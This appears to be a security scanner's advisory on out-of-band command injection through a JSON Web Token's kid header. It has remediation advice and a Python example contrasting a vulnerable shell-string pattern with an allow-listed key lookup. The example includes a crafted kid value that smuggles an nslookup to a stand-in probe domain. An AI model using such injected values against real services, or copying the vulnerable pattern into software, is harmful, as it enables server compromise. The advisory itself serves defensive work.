PCI v3.2-6.5.1
CAPEC-88
CWE-78
ISO27001-A.14.2.5
WASC-31
OWASP 2013-A1
OWASP 2017-A1
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

JWT kid Parameter Out of Band Command Injection

Severity:
Critical
Summary

Invicti detected an out-of-band command injection vulnerability in the kid (key ID) header parameter of a JSON Web Token. The finding was confirmed by capturing a DNS A record request for a scanner-controlled hostname, which is issued when the kid value is interpreted as part of an operating system command. Because the server has to read kid to decide which key verifies the token, the value is processed before the signature can be checked, so an attacker controls it completely.

Remediation

  • Use an allow-list of valid values and disallow any other input.
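The following is an added example, not Invicti's code or code from any affected product. It shows the vulnerable pattern the finding describes (a kid header interpolated into a shell command string) next to an allow-listed lookup that never touches a shell. The key directory, the allow-listed key IDs, the HS256 secret and the oob.example probe domain are assumptions made for illustration; the token is constructed inline.

```python
"""Constructed JWT kid command-injection example (not from the original page).

KEY_DIR, ALLOWED_KIDS, the HMAC secret and the oob.example domain are
hypothetical values used only to make the example self-contained.
"""
import base64
import hashlib
import hmac
import json
import os
import re

KEY_DIR = "/etc/app/jwt-keys"                  # hypothetical key store
ALLOWED_KIDS = {"key-2024-01", "key-2024-07"}  # hypothetical allow-list
KID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # defence in depth behind the allow-list


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def make_token(header: dict, payload: dict, secret: bytes) -> str:
    """Build an HS256 JWT. An attacker can sign with any secret: the server
    must read kid before it knows which key would verify the signature."""
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"


def header_of(token: str) -> dict:
    """Decode the JOSE header (first segment); no signature check happens here."""
    return json.loads(b64url_decode(token.split(".")[0]))


def key_command_vulnerable(token: str) -> str:
    """Vulnerable pattern: interpolate the untrusted kid into a shell string.

    The returned string is what vulnerable code would pass to
    subprocess.run(cmd, shell=True); this example only returns it.
    """
    kid = header_of(token)["kid"]
    return f"cat {KEY_DIR}/{kid}.pem"


def kid_is_allowed(kid) -> bool:
    """Allow-list first; the regex only adds a second, stricter barrier."""
    return isinstance(kid, str) and kid in ALLOWED_KIDS and KID_RE.match(kid) is not None


def key_path_hardened(token: str) -> str:
    """Hardened: reject anything not on the allow-list and never invoke a shell."""
    kid = header_of(token).get("kid")
    if not kid_is_allowed(kid):
        raise ValueError("unknown kid")
    return os.path.join(KEY_DIR, kid + ".pem")


# Constructed out-of-band probe: the ';' terminates the cat command and the
# nslookup forces a DNS A lookup of a scanner-controlled name, which is the
# signal the scanner captures. '#' comments out the trailing '.pem'.
OOB_KID = "x;nslookup kid-probe.oob.example;#"
ATTACK_TOKEN = make_token({"alg": "HS256", "typ": "JWT", "kid": OOB_KID}, {"sub": "1"}, b"any")
GOOD_TOKEN = make_token({"alg": "HS256", "typ": "JWT", "kid": "key-2024-01"}, {"sub": "1"}, b"any")

if __name__ == "__main__":
    print("vulnerable command:", key_command_vulnerable(ATTACK_TOKEN))
    print("hardened path:", key_path_hardened(GOOD_TOKEN))
    try:
        key_path_hardened(ATTACK_TOKEN)
    except ValueError as e:
        print("hardened rejects probe:", e)
```

The hardened variant treats kid as a lookup index, not as data to build a path or command from; even if a shell were unavoidable, quoting the value would still be weaker than refusing everything outside the allow-list.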
